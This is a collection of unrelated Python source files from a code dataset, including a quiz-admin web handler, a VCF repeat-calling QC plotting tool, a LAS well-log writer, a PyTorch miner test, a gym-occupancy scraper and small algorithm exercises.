f_out.write(word+'\\t'+str(freq)+'\\t'+str(idx)+ '\\n')\n","sub_path":"src/preprocessing/map_tokens_to_indices_scibert.py","file_name":"map_tokens_to_indices_scibert.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19369318","text":"import urllib.parse\nimport db\nimport server\n\ndef add_a_question(request,response):\n# data = \"\"\"\n#
\n# Question:
\n#
\n# Option 1:
\n#
\n# Option 2:
\n#
\n# Option 3:
\n#
\n# Option 4:
\n#
\n# Answer(Enter the option number):
\n#
\n# Score:
\n#
\n# \n#
\n# Back\n# \"\"\"\n with open(\"./public/html/pyAddQuestion.html\", \"r\") as file_descriptor:\n res = file_descriptor.read()\n return server.send_html_handler(request, response, res)\n\ndef listForm(dictQ):\n l = []\n l.append(urllib.parse.unquote_plus(str(dictQ['quest'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt1'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt2'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt3'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt4'])))\n l.append(dictQ['ans'])\n l.append(dictQ['score'])\n return l\n\n\ndef add_a_question_post(request,response):\n que = listForm(request['content'])\n print(request['content'])\n print(request)\n db.add_question_pyExam(que)\n data = \"\"\"\n
\n Question:
\n
\n Option 1:
\n
\n Option 2:
\n
\n Option 3:
\n
\n Option 4:
\n
\n Answer(Enter the option number):
\n
\n Score:
\n
\n \n
\nBack\n\"\"\"\n return server.send_html_handler(request, response, data)\n\ndef formatQuestions(dataItem):\n #print(\"format\")\n #print(dataItem)\n formattedQ = \"\"\"
  • Question:
    \n \"\"\"+dataItem[1]+\"\"\"

    Options:
    \n 1.\"\"\"+dataItem[2]+\"\"\"
    \n 2.\"\"\"+dataItem[3]+\"\"\"
    \n 3.\"\"\"+dataItem[4]+\"\"\"
    \n 4.\"\"\"+dataItem[5]+\"\"\"

    \n Answer: Option \"\"\"+str(dataItem[6])+\"\"\"
    \n Score:\"\"\"+str(dataItem[7])+\"\"\"

  • \"\"\"\n #print(\"format\")\n return formattedQ\n\ndef view_questions(request, response):\n data = db.view_questions_pyExam()\n print(data)\n list2 = list(map(formatQuestions, data))\n finalList = ''.join(list2)\n with open(\"./public/html/pyViewQuestions.html\", \"r\") as file_descriptor:\n res = file_descriptor.read()\n result = res.format(finalList)\n# htmlCode = \"\"\"\n# \n# Nemo\n# \n# \n# \n#
      %s
    \n# Back\n# \n# \"\"\" %(finalList)\n return server.send_html_handler(request, response, result)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"62000360","text":"#!/usr/bin/env python3\n\"\"\"\nTool for generating various QC plots for TR callsets\n\"\"\"\n\n# Allow making plots even with no x-forward\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\n# Allow plots to be editable in Adobe Illustrator\nimport matplotlib\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n# Imports\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\nimport vcf\n\n# Load local libraries\nif __name__ == \"qcSTR\" or __name__ == '__main__' or __package__ is None:\n sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"trtools\", \"utils\"))\n import common\n import tr_harmonizer as trh\n import version\nelse: # pragma: no cover\n import trtools.utils.common as common # pragma: no cover\n import trtools.utils.tr_harmonizer as trh # pragma: no cover\n import trtools.utils.version as version\n\n__version__ = version.__version__\n\n\ndef OutputDiffRefHistogram(diffs_from_ref, fname):\n r\"\"\"Plot histogram of difference in bp from reference allele\n\n Parameters\n ----------\n diffs_from_ref : list of int\n Difference of each allele call from the ref allele (in units)\n fname : str\n Filename of output plot\n \"\"\"\n MAXPOSS = 50 # don't let histogram go beyond this\n minval = max(-1*MAXPOSS, min(diffs_from_ref))\n maxval = min(MAXPOSS, max(diffs_from_ref))\n extremeval = max(abs(minval), abs(maxval))\n bins = np.arange(-1*extremeval, extremeval, 1)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(diffs_from_ref, bins=bins, color=\"black\", edgecolor=\"white\", log=True)\n ax.set_xlabel(\"Difference from ref (rpt. units)\", size=15)\n ax.set_ylabel(\"Number of alleles\", size=15)\n fig.savefig(fname)\n plt.close()\n\ndef OutputDiffRefBias(diffs_from_ref, reflens, fname):\n r\"\"\"Plot reflen vs. mean difference from ref bias plot\n\n Parameters\n ----------\n diffs_from_ref : list of int\n Difference of each allele call from the ref allele (in bp)\n reflens : list of int\n List of reference allele lengths for each call (in bp)\n fname : str\n Filename of output plot\n \"\"\"\n data = pd.DataFrame({\"diff\": diffs_from_ref, \"ref\": reflens, \"count\": [1]*len(reflens)})\n data[\"ref\"] = data[\"ref\"].apply(lambda x: int(x/5)*5) # bin by 5bp\n summ = data.groupby(\"ref\", as_index=False).agg({\"diff\": np.mean, \"count\": len}).sort_values(\"ref\") # median or mean?\n summ = summ[summ[\"count\"]>=25] # exclude small counts\n trcounts = np.cumsum(summ[\"count\"])\n trfreqs = trcounts/np.sum(summ[\"count\"])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(summ[\"ref\"], summ[\"diff\"], marker=\"o\", color=\"darkblue\")\n ax.axhline(y=0, linestyle=\"dashed\", color=\"gray\")\n ax.set_xlabel(\"Reference length (bp)\", size=15)\n ax.set_ylabel(\"Median diff from ref (bp)\", size=15)\n ax1 = ax.twinx()\n ax1.plot(summ[\"ref\"], trfreqs, color=\"darkred\")\n ax1.set_ylabel(\"Cumulative fraction of alleles\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef OutputSampleCallrate(sample_calls, fname):\n r\"\"\"Plot number of calls per sample\n\n Parameters\n ----------\n sample_calls : dict of str->int\n Number of calls for each sample\n fname : str\n Filename of output plot\n \"\"\"\n samples = sample_calls.keys()\n data = pd.DataFrame({\"sample\": samples, \"numcalls\": [sample_calls[key] for key in samples]})\n #data = data.sort_values(\"numcalls\") # Commented because the order would be incorrect if sorted\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(range(data.shape[0]), data[\"numcalls\"])\n ax.set_xticks(range(data.shape[0]))\n ax.set_xticklabels(samples, rotation=90)\n ax.set_ylabel(\"Number of calls\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef OutputChromCallrate(chrom_calls, fname):\n r\"\"\"Plot number of calls per chromosome\n\n Parameters\n ----------\n chrom_calls : dict of str->int\n Number of calls for each chromosome\n fname : str\n Filename of output plot\n \"\"\"\n chroms = sorted(chrom_calls.keys())\n counts = [chrom_calls[chrom] for chrom in chroms]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(range(len(counts)), counts)\n ax.set_xticks(range(len(counts)))\n ax.set_xticklabels(chroms, rotation=90)\n ax.set_ylabel(\"Number of calls\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef getargs(): # pragma: no cover\n parser = argparse.ArgumentParser(__doc__)\n ### Required arguments ###\n req_group = parser.add_argument_group(\"Required arguments\")\n req_group.add_argument(\"--vcf\", help=\"VCF file to analyze.\", type=str, required=True)\n req_group.add_argument(\"--out\", help=\"Output prefix for files generated\", type=str, required=True)\n req_group.add_argument(\"--vcftype\", help=\"Options=%s\"%[str(item) for item in trh.VCFTYPES.__members__], type=str, default=\"auto\")\n filter_group = parser.add_argument_group(\"Filtering group\")\n filter_group.add_argument(\"--samples\", help=\"File containing list of samples to include\", type=str)\n filter_group.add_argument(\"--period\", help=\"Only consider repeats with this motif length\", type=int)\n debug_group = parser.add_argument_group(\"Debug group\")\n debug_group.add_argument(\"--numrecords\", help=\"Only process this many records\", type=int)\n ver_group = parser.add_argument_group(\"Version\")\n ver_group.add_argument(\"--version\", action=\"version\", version = '{version}'.format(version=__version__))\n args = parser.parse_args()\n return args\n\ndef main(args):\n if not os.path.exists(args.vcf):\n common.WARNING(\"%s does not exist\"%args.vcf)\n return 1\n # Set up reader and harmonizer\n invcf = vcf.Reader(filename=args.vcf)\n if args.vcftype != 'auto':\n vcftype = trh.VCFTYPES[args.vcftype]\n else:\n vcftype = trh.InferVCFType(invcf)\n\n # Load samples\n if args.samples:\n samplelist = [item.strip() for item in open(args.samples, \"r\").readlines()]\n else: samplelist = invcf.samples\n \n # Set up data to keep track of\n sample_calls = dict([(sample, 0) for sample in samplelist]) # sample->numcalls\n contigs = invcf.contigs\n if len(contigs) == 0:\n common.MSG(\"Warning: no contigs found in VCF file.\")\n chrom_calls = dict([(chrom, 0) for chrom in contigs]) # chrom->numcalls\n diffs_from_ref = [] # for each allele call, keep track of diff (bp) from ref\n diffs_from_ref_unit = [] # for each allele call, keep track of diff (units) from ref\n reflens = [] # for each allele call, keep track of reference length (bp)\n\n numrecords = 0\n for record in invcf:\n if args.numrecords is not None and numrecords >= args.numrecords: break\n chrom = record.CHROM\n trrecord = trh.HarmonizeRecord(vcftype, record)\n if args.period is not None and len(trrecord.motif) != args.period: continue\n # Extract stats\n rl = len(trrecord.ref_allele)\n allele_counts = trrecord.GetAlleleCounts(uselength=False, samplelist=samplelist)\n called_samples = [item.sample for item in record if item.called]\n # Update data\n num_calls = 0\n for s in called_samples:\n try:\n sample_calls[s] += 1\n num_calls += 1\n except KeyError: pass\n chrom_calls[chrom] = chrom_calls.get(chrom, 0) + num_calls\n for allele in allele_counts.keys():\n allelediff = len(allele)-rl\n count = allele_counts[allele]\n reflens.extend([rl]*count)\n diffs_from_ref.extend([allelediff]*count)\n diffs_from_ref_unit.extend([allelediff/len(trrecord.motif)]*count)\n numrecords += 1\n\n OutputDiffRefHistogram(diffs_from_ref_unit, args.out + \"-diffref-histogram.pdf\")\n OutputDiffRefBias(diffs_from_ref, reflens, args.out + \"-diffref-bias.pdf\")\n OutputSampleCallrate(sample_calls, args.out+\"-sample-callnum.pdf\")\n OutputChromCallrate(chrom_calls, args.out+\"-chrom-callnum.pdf\")\n return 0\n\ndef run(): # pragma: no cover\n args = getargs()\n retcode = main(args)\n sys.exit(retcode)\n\nif __name__ == \"__main__\": # pragma: no cover\n run()\n","sub_path":"qcSTR/qcSTR.py","file_name":"qcSTR.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"616960232","text":"import sys\nimport re\nimport math\ns=sys.stdin.read()\ndigits=re.findall(r\"\\d+\",s)\nlistline= [int(e) for e in digits ]\nn=listline[0] \ndel(listline[0])\nlistline.sort()\ncount=0\ntime=0\nfor i in range(n):\n if time<=listline[i]:\n count+=1\n time+=listline[i]\nprint(count)","sub_path":"Code/CodeRecords/2814/60753/242042.py","file_name":"242042.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"215451876","text":"import re\nif __name__ == '__main__':\n txts = []\n spll = []\n for _ in range(int(input())):\n txts.append(input())\n for _ in range(int(input())):\n uk = input()\n us = uk.replace('our', 'or')\n matcher = re.compile(\"({}|{})( |$)\".format(uk, us))\n cnt = 0\n for string in txts:\n cnt += len(matcher.findall(string))\n print(cnt)\n","sub_path":"HackerRank/Regexp/Application/21UKAndUSASpellingStyles/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"289184993","text":"import unittest\r\nimport torch\r\nfrom pytorch_metric_learning.miners import BatchHardMiner\r\nfrom pytorch_metric_learning.utils import common_functions as c_f\r\n\r\nclass TestBatchHardMiner(unittest.TestCase):\r\n\r\n @classmethod\r\n def setUpClass(self):\r\n self.dist_miner = BatchHardMiner(use_similarity=False, normalize_embeddings=False)\r\n self.sim_miner = BatchHardMiner(use_similarity=True, normalize_embeddings=True)\r\n self.labels = torch.LongTensor([0, 0, 1, 1, 0, 2, 1, 1, 1])\r\n self.correct_a = torch.LongTensor([0, 1, 2, 3, 4, 6, 7, 8])\r\n self.correct_p = torch.LongTensor([4, 4, 8, 8, 0, 2, 2, 2])\r\n self.correct_n = [torch.LongTensor([2, 2, 1, 4, 3, 5, 5, 5]), torch.LongTensor([2, 2, 1, 4, 5, 5, 5, 5])]\r\n\r\n def test_dist_mining(self):\r\n embeddings = torch.arange(9).float().unsqueeze(1)\r\n a, p, n = self.dist_miner(embeddings, self.labels)\r\n self.helper(a, p, n)\r\n\r\n def test_sim_mining(self):\r\n angles = [0, 10, 20, 30, 40, 50, 60, 70, 80]\r\n embeddings = torch.FloatTensor([c_f.angle_to_coord(a) for a in angles])\r\n a, p, n = self.sim_miner(embeddings, self.labels)\r\n self.helper(a, p, n)\r\n\r\n def helper(self, a, p, n):\r\n self.assertTrue(torch.equal(a, self.correct_a))\r\n self.assertTrue(torch.equal(p, self.correct_p))\r\n self.assertTrue(any(torch.equal(n, cn) for cn in self.correct_n))\r\n\r\n def test_empty_output(self):\r\n batch_size = 32\r\n embeddings = torch.randn(batch_size, 64)\r\n labels = torch.arange(batch_size)\r\n a, p, n = self.dist_miner(embeddings, labels)\r\n self.assertTrue(len(a)==0)\r\n self.assertTrue(len(p)==0)\r\n self.assertTrue(len(n)==0)\r\n\r\n a, p, n = self.sim_miner(embeddings, labels)\r\n self.assertTrue(len(a)==0)\r\n self.assertTrue(len(p)==0)\r\n self.assertTrue(len(n)==0)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"tests/miners/test_batch_hard_miner.py","file_name":"test_batch_hard_miner.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"240462376","text":"import os\nimport random\nimport torch\nfrom collections import Counter\nfrom PIL import Image\nfrom skeleton_model import HCN\nfrom torchvision.transforms import transforms\nfrom torchvision.models.resnet import resnet18, resnet101\nfrom data_load_utils import parse_label, extract_data\n\n\nNUM_CLASSES = 51\n\n# modal, models architecture and checkpoints\nmodals = ['skeleton', 'rgb', 'optical_flow', 'depth', 'infrared', 'infrared_depth']\nmodels_checkpoints = {\n 'skeleton': (HCN(), 'checkpoints/skeleton.pt'),\n 'rgb': (resnet101(num_classes=NUM_CLASSES), 'checkpoints/rgb.pt'),\n 'optical_flow': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/optical_flow.pt'),\n 'depth': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/depth.pt'),\n 'infrared': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/infrared.pt'),\n 'infrared_depth': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/infrared_depth.pt')\n}\n\ndata_transforms = transforms.Compose([\n transforms.Resize(255),\n transforms.RandomCrop(224),\n transforms.ToTensor()\n])\n\n\ndef model_load_checkpoint():\n loaded_models = {}\n for modal in modals:\n model, checkpoint_path = models_checkpoints[modal]\n model.load_state_dict(torch.load(checkpoint_path, map_location='cpu'))\n model.eval()\n loaded_models[modal] = model\n return loaded_models\n\n\ndef predict(models, inputs):\n choices = []\n for modal in modals:\n print('predicting modal - {0}...'.format(modal))\n model, x = models[modal], inputs[modal]\n if modal == 'skeleton':\n x = torch.tensor(x).float()\n x = x.unsqueeze(0)\n else:\n x = Image.fromarray(x.astype('uint8')).convert('RGB')\n x = data_transforms(x).float()\n x = x.unsqueeze(0)\n output = model(x)\n _, prediction = torch.max(output, 1)\n print(' > modal - {0}: {1}'.format(modal, prediction))\n choices.append(prediction.item())\n # count votes and random select if more than one candidate\n counter = Counter(choices)\n print('vote result:', counter)\n most_vote = max(counter.values())\n options = []\n for k, v in counter.items():\n if v == most_vote:\n options.append(k)\n return random.choice(options)\n\n\nif __name__ == '__main__':\n models = model_load_checkpoint()\n print('model initialization finished and parameters loaded...')\n\n data_dir = './data_sample'\n label_file_path = os.path.join(data_dir, 'label.txt')\n num_actions, action_classes, start_frames, end_frames = parse_label(label_file_path)\n\n random_index = random.randint(1, num_actions) - 1\n cur_action_class = action_classes[random_index]\n s_timestamp, e_timestamp = start_frames[random_index], end_frames[random_index]\n multi_modal_inputs = extract_data(data_dir, s_timestamp, e_timestamp)\n print('ground truth label:', cur_action_class - 1)\n prediction = predict(models, multi_modal_inputs)\n print('voting result:', prediction)\n","sub_path":"multi-modal/voting.py","file_name":"voting.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"254225808","text":"import datetime\nimport json\nimport os\nimport time\n\nimport pandas as pd\n\nfrom configs import (\n PATHS,\n TIME_BETWEEN_SCRAPES,\n TIME_BETWEEN_RETRIES,\n)\nfrom utils.scrape_utils import get_paths, print_updates, read_n_people\n\nDATA_PATH = get_paths(PATHS)\n\n\ndef main():\n\n credentials_path = os.path.join(DATA_PATH, \"puregym_credentials.json\")\n\n with open(credentials_path, \"r\") as read_file:\n credentials = json.load(read_file)\n\n people_counts = pd.Series()\n\n file_path = os.path.join(\n os.path.join(DATA_PATH, \"data_n_people\"),\n datetime.datetime.now().strftime(\n \"gym_people_counts_run_starting_%Y_%m_%d__%H_%M.csv\"\n ),\n )\n\n errors_this_run = 0\n start_time = time.time()\n\n while True:\n try:\n people_counts = read_n_people(people_counts, credentials, file_path)\n print_updates(start_time, errors_this_run)\n time.sleep(TIME_BETWEEN_SCRAPES)\n except Exception as e:\n errors_this_run += 1\n print(e)\n print_updates(start_time, errors_this_run)\n time.sleep(TIME_BETWEEN_RETRIES)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scrape_n_people_in_gym.py","file_name":"scrape_n_people_in_gym.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"565644566","text":"import logging\nimport textwrap\n\nimport numpy as np\n\nfrom .las_items import (\n HeaderItem, CurveItem, SectionItems, OrderedDict)\nfrom . import defaults\nfrom . import exceptions\n\nlogger = logging.getLogger(__name__)\n\n\ndef write(las, file_object, version=None, wrap=None, STRT=None,\n STOP=None, STEP=None, fmt='%10.5g'):\n if wrap is None:\n wrap = las.version['WRAP'] == 'YES'\n elif wrap is True:\n las.version['WRAP'] = HeaderItem(\n 'WRAP', '', 'YES', 'Multiple lines per depth step')\n elif wrap is False:\n las.version['WRAP'] = HeaderItem(\n 'WRAP', '', 'NO', 'One line per depth step')\n lines = []\n\n assert version in (1.2, 2, None)\n if version is None:\n version = las.version['VERS'].value\n if version == 1.2:\n las.version['VERS'] = HeaderItem(\n 'VERS', '', 1.2, 'CWLS LOG ASCII STANDARD - VERSION 1.2')\n elif version == 2:\n las.version['VERS'] = HeaderItem(\n 'VERS', '', 2.0, 'CWLS log ASCII Standard -VERSION 2.0')\n\n if STRT is None:\n STRT = las.index[0]\n if STOP is None:\n STOP = las.index[-1]\n if STEP is None:\n STEP = las.index[1] - las.index[0] # Faster than np.gradient\n las.well['STRT'].value = STRT\n las.well['STOP'].value = STOP\n las.well['STEP'].value = STEP\n\n # Check units\n if las.curves[0].unit:\n unit = las.curves[0].unit\n else:\n unit = las.well['STRT'].unit\n las.well['STRT'].unit = unit\n las.well['STOP'].unit = unit\n las.well['STEP'].unit = unit\n las.curves[0].unit = unit\n\n # Check for any changes in the pandas dataframe and if there are,\n # create new curves so they are reflected in the output LAS file.\n\n # if las.use_pandas:\n # curve_names = lambda: [ci.mnemonic for ci in las.curves]\n # for df_curve_name in list(las.df.columns.values):\n # if not df_curve_name in curve_names():\n # las.add_curve(df_curve_name, las.df[df_curve_name])\n\n # Write each section.\n\n # ~Version\n logger.debug('LASFile.write Version section')\n lines.append('~Version '.ljust(60, '-'))\n order_func = get_section_order_function('Version', version)\n section_widths = get_section_widths(\n 'Version', las.version, version, order_func)\n for header_item in las.version.values():\n mnemonic = header_item.original_mnemonic\n # logger.debug('LASFile.write ' + str(header_item))\n order = order_func(mnemonic)\n # logger.debug('LASFile.write order = %s' % (order, ))\n logger.debug('LASFile.write %s\\norder=%s section_widths=%s' % (\n header_item, order, section_widths))\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Well\n logger.debug('LASFile.write Well section')\n lines.append('~Well '.ljust(60, '-'))\n order_func = get_section_order_function('Well', version)\n section_widths = get_section_widths(\n 'Well', las.well, version, order_func)\n # logger.debug('LASFile.write well section_widths=%s' % section_widths)\n for header_item in las.well.values():\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n logger.debug('LASFile.write %s\\norder=%s section_widths=%s' % (\n header_item, order, section_widths))\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Curves\n logger.debug('LASFile.write Curves section')\n lines.append('~Curves '.ljust(60, '-'))\n order_func = get_section_order_function('Curves', version)\n section_widths = get_section_widths(\n 'Curves', las.curves, version, order_func)\n for header_item in las.curves:\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Params\n lines.append('~Params '.ljust(60, '-'))\n order_func = get_section_order_function('Parameter', version)\n section_widths = get_section_widths(\n 'Parameter', las.params, version, order_func)\n for header_item in las.params.values():\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Other\n lines.append('~Other '.ljust(60, '-'))\n lines += las.other.splitlines()\n\n lines.append('~ASCII '.ljust(60, '-'))\n\n file_object.write('\\n'.join(lines))\n file_object.write('\\n')\n\n # data_arr = np.column_stack([c.data for c in las.curves])\n data_arr = las.data\n nrows, ncols = data_arr.shape\n\n def format_data_section_line(n, fmt, l=10, spacer=' '):\n try:\n if np.isnan(n):\n return spacer + str(las.well['NULL'].value).rjust(l)\n else:\n return spacer + (fmt % n).rjust(l)\n except TypeError:\n return spacer + str(n).rjust(l)\n\n twrapper = textwrap.TextWrapper(width=79)\n for i in range(nrows):\n depth_slice = ''\n for j in range(ncols):\n depth_slice += format_data_section_line(data_arr[i, j], fmt)\n\n if wrap:\n lines = twrapper.wrap(depth_slice)\n logger.debug('LASFile.write Wrapped %d lines out of %s' %\n (len(lines), depth_slice))\n else:\n lines = [depth_slice]\n\n if las.version['VERS'].value == 1.2:\n for line in lines:\n if len(line) > 255:\n logger.warning(\n 'LASFile.write Data line > 256 chars: %s' % line)\n\n for line in lines:\n file_object.write(line + '\\n')\n\n\ndef get_formatter_function(order, left_width=None, middle_width=None):\n '''Create function to format a LAS header item.\n\n Arguments:\n order: format of item, either 'descr:value' or 'value:descr' -- see\n LAS 1.2 and 2.0 specifications for more information.\n\n Keyword Arguments:\n left_width (int): number of characters to the left hand side of the\n first period\n middle_width (int): total number of characters minus 1 between the\n first period from the left and the first colon from the left.\n\n Returns:\n A function which takes a header item (e.g. LASHeaderItem or Curve)\n as its single argument and which in turn returns a string which is\n the correctly formatted LAS header line.\n\n '''\n if left_width is None:\n left_width = 10\n if middle_width is None:\n middle_width = 40\n mnemonic_func = lambda mnemonic: mnemonic.ljust(left_width)\n middle_func = lambda unit, right_hand_item: (\n unit\n + ' ' * (middle_width - len(str(unit)) - len(right_hand_item))\n + right_hand_item\n )\n if order == 'descr:value':\n return lambda item: '%s.%s : %s' % (\n mnemonic_func(item.original_mnemonic),\n middle_func(str(item.unit), str(item.descr)),\n item.value\n )\n elif order == 'value:descr':\n return lambda item: '%s.%s : %s' % (\n mnemonic_func(item.original_mnemonic),\n middle_func(str(item.unit), str(item.value)),\n item.descr\n )\n\n\ndef get_section_order_function(section, version,\n order_definitions=defaults.ORDER_DEFINITIONS):\n '''Get a function that returns the order per mnemonic and section.\n\n Arguments:\n section (str): either 'well', 'params', 'curves', 'version'\n version (float): either 1.2 and 2.0\n\n Keyword Arguments:\n order_definitions (dict): ...\n\n Returns:\n A function which takes a mnemonic (str) as its only argument, and \n in turn returns the order 'value:descr' or 'descr:value'.\n\n '''\n section_orders = order_definitions[version][section]\n default_order = section_orders[0]\n orders = {}\n for order, mnemonics in section_orders[1:]:\n for mnemonic in mnemonics:\n orders[mnemonic] = order\n return lambda mnemonic: orders.get(mnemonic, default_order)\n\n\ndef get_section_widths(section_name, items, version, order_func,\n middle_padding=5):\n '''Find minimum section widths fitting the content in *items*.\n\n Arguments:\n section_name (str): either 'version', 'well', 'curves', or 'params'\n items (SectionItems): section items\n version (float): either 1.2 or 2.0\n\n '''\n section_widths = {\n 'left_width': None,\n 'middle_width': None\n }\n if len(items) > 0:\n section_widths['left_width'] = max(\n [len(i.original_mnemonic) for i in items])\n middle_widths = []\n for i in items:\n order = order_func(i.mnemonic)\n rhs_element = order.split(':')[0]\n logger.debug(\n 'get_section_widths %s\\n\\torder=%s rhs_element=%s' % (\n i, order, rhs_element))\n middle_widths.append(\n len(str(i.unit)) + 1 + len(str(i[rhs_element])))\n section_widths['middle_width'] = max(middle_widths)\n return section_widths\n","sub_path":"lasio/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":9365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"437915893","text":"from heapq import heapify, heappush, heappop\n\n\ndef nsmallest(m):\n n = len(m)\n h = [(m[i][0][0], i, 0, 0) for i in xrange(n)]\n heapify(h)\n results = []\n s = set()\n while True:\n val, i, j, k = heappop(h)\n results.append(val)\n if len(results) == n:\n return results\n else:\n if j+1 < n and (i, j+1, k) not in s:\n s.add((i, j+1, k))\n heappush(h, (m[i][j+1][k], i, j+1, k))\n if k+1 < n and (i, j, k+1) not in s:\n s.add((i, j, k+1))\n heappush(h, (m[i][j][k+1], i, j, k+1))\n","sub_path":"heaps/n_smallest_matrix.py","file_name":"n_smallest_matrix.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"385841034","text":"import numpy as np\r\nimport random\r\n\r\n\r\ndef IDK(X, t, psi):\r\n # # distance between every two points\r\n # distance_matrix = np.zeros((X.shape[0], X.shape[0]))\r\n # feature map of D\r\n featuremap_count = np.zeros(t * psi)\r\n # onepoint_matrix[i]记录第i个点map到的t*psi维向量里哪些位置为1,onepoint_matrix[i][j]: area number of the i-th point in the j-th partition\r\n # 如果为初始值-1则表示该点在第time次映射到全0向量\r\n onepoint_matrix = np.full((X.shape[0], t), -1)\r\n pre_scores = np.zeros(X.shape[0])\r\n # for i in range(X.shape[0]):\r\n # for j in range(X.shape[0]):\r\n # if i < j:\r\n # distance_matrix[i][j] = np.linalg.norm(X[i] - X[j])\r\n # else:\r\n # distance_matrix[i][j] = distance_matrix[j][i]\r\n for time in range(t):\r\n sample_num = psi #\r\n sample_list = [p for p in range(X.shape[0])] # [0, 1, 2, 3]\r\n sample_list = random.sample(sample_list, sample_num) # [1, 2]\r\n sample = X[sample_list, :] # array([[ 4, 5, 6, 7], [ 8, 9, 10, 11]])\r\n # distance between sample\r\n tem = np.dot(np.square(sample), np.ones(sample.T.shape))\r\n sample2sample = tem + tem.T - 2 * np.dot(sample, sample.T)\r\n\r\n # for i in range(len(sample_list)):\r\n # for j in range(len(sample_list)):\r\n # if i != j:\r\n # if radius_list[i] == 0:\r\n # radius_list[i] = distance_matrix[sample_list[i]][sample_list[j]]\r\n #\r\n # elif radius_list[i] > distance_matrix[sample_list[i]][sample_list[j]]:\r\n # radius_list[i] = distance_matrix[sample_list[i]][sample_list[j]]\r\n sample2sample[sample2sample < 1e-9] = 99999999;\r\n radius_list = np.min(sample2sample, axis=1) # 每行的最小值形成一个行向量\r\n\r\n tem1 = np.dot(np.square(X), np.ones(sample.T.shape)) # n*psi\r\n tem2 = np.dot(np.ones(X.shape), np.square(sample.T))\r\n point2sample = tem1 + tem2 - 2 * np.dot(X, sample.T) # n*psi\r\n min_dist_point2sample = np.argmin(point2sample, axis=1) # index\r\n # min_dist_point2sample_val = np.argmin(point2sample, axis=1)\r\n\r\n # map all points\r\n # for i in range(X.shape[0]):\r\n # for j in range(len(sample_list)):\r\n # if distance_matrix[i][sample_list[j]] < radius_list[j]:\r\n # if onepoint_matrix[i][time] == -1:\r\n # onepoint_matrix[i][time] = j + time * psi\r\n # elif distance_matrix[i][sample_list[j]] < distance_matrix[i][\r\n # sample_list[onepoint_matrix[i][time] - time * psi]]:\r\n # onepoint_matrix[i][time] = j + time * psi\r\n # if onepoint_matrix[i][time] != -1:\r\n # featuremap_count[onepoint_matrix[i][time]] += 1\r\n for i in range(X.shape[0]):\r\n if point2sample[i][min_dist_point2sample[i]] < radius_list[min_dist_point2sample[i]]:\r\n onepoint_matrix[i][time] = min_dist_point2sample[i] + time * psi\r\n featuremap_count[onepoint_matrix[i][time]] += 1\r\n\r\n # feature map of D\r\n featuremap_count /= X.shape[0]\r\n # cal feature map of every point\r\n count_list = np.zeros(X.shape[0])\r\n for i in range(onepoint_matrix.shape[0]):\r\n for ele in onepoint_matrix[i]:\r\n if ele != -1:\r\n pre_scores[i] += featuremap_count[ele]\r\n count_list[i] += 1\r\n #return pre_scores/np.sqrt(count_list)/np.sqrt(np.dot(featuremap_count.T,featuremap_count))\r\n return pre_scores / np.sqrt(t) / np.sqrt(np.dot(featuremap_count.T, featuremap_count))\r\n #return 